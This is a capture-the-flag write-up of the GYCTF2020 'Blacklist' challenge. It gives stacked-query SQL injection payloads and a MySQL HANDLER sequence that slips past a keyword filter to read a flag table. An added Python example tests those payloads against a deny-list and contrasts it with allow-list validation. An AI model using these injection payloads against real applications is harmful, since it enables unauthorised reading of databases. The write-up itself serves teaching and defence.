[GYCTF2020]Blacklist
payload: 1'
payload: 1';show databases;
payload: 1';show tables;
payload: 1';select * from FlagHere;
Many sensitive characters are filtered here.
payload: 1';
HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;
HANDLER Statement
HANDLER tbl_name OPEN [ [AS] alias]
HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
[ WHERE where_condition ] [LIMIT ... ]
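HANDLER tbl_name CLOSE
This statement provides direct access to the table storage engine interfaces. It can be used for tables
The HANDLER ... OPEN statement opens a table, making it accessible using subsequent HANDLER ... READ statements. This table object is not shared by other sessions and is not closed until the session calls HANDLER ... CLOSE or the session terminates.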
Example:
mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| users          |
| word1          |
+----------------+
2 rows in set (0.00 sec)
mysql> HANDLER users OPEN;
Query OK, 0 rows affected (0.39 sec)
mysql> HANDLER users READ FIRST;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Bob      | 123456   |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> HANDLER users CLOSE;
Query OK, 0 rows affected (0.00 sec)
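
Why a keyword filter does not stop the HANDLER payload above, as an added example (not part of the original writeup or the challenge's code): it runs the page's payloads through a deny-list, counts the statements each one produces, and contrasts that with an allow-list check on the parameter. The deny-list pattern, the query template and the table name words are constructed assumptions.

```python
import re

# Constructed deny-list (assumption: the challenge's real filter is not shown on the page).
BLACKLIST = re.compile(r"select|update|delete|drop|insert|where|set|prepare|alter|rename", re.I)
# Assumed query shape: the parameter is concatenated into a quoted literal.
TEMPLATE = "SELECT * FROM words WHERE id = '{}'"

def blacklist_allows(value):
    """Deny-list check: anything that avoids the listed keywords passes."""
    return BLACKLIST.search(value) is None

def split_statements(sql):
    """Split on ';' outside single-quoted literals (minimal: no escapes or comments)."""
    parts, buf, in_str = [], [], False
    for ch in sql:
        if ch == "'":
            in_str = not in_str
        if ch == ";" and not in_str:
            parts.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf).strip())
    return [p for p in parts if p]

def is_stacked(value):
    """True when the value turns the one intended statement into several."""
    return len(split_statements(TEMPLATE.format(value))) > 1

def allowlist_id(value):
    """Allow-list check: accept only a short decimal integer, then bind it as a parameter."""
    if not re.fullmatch(r"[0-9]{1,10}", value):
        raise ValueError("id must be a decimal integer")
    return int(value)

# Payloads quoted from the page, plus two constructed benign values.
SAMPLES = [
    "1",
    "a;b",
    "1';select * from FlagHere;",
    "1';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(blacklist_allows(s), is_stacked(s), repr(s))
```

The HANDLER payload passes the deny-list while still producing several statements; the allow-list rejects it because it is not an integer, independent of which SQL keywords it contains.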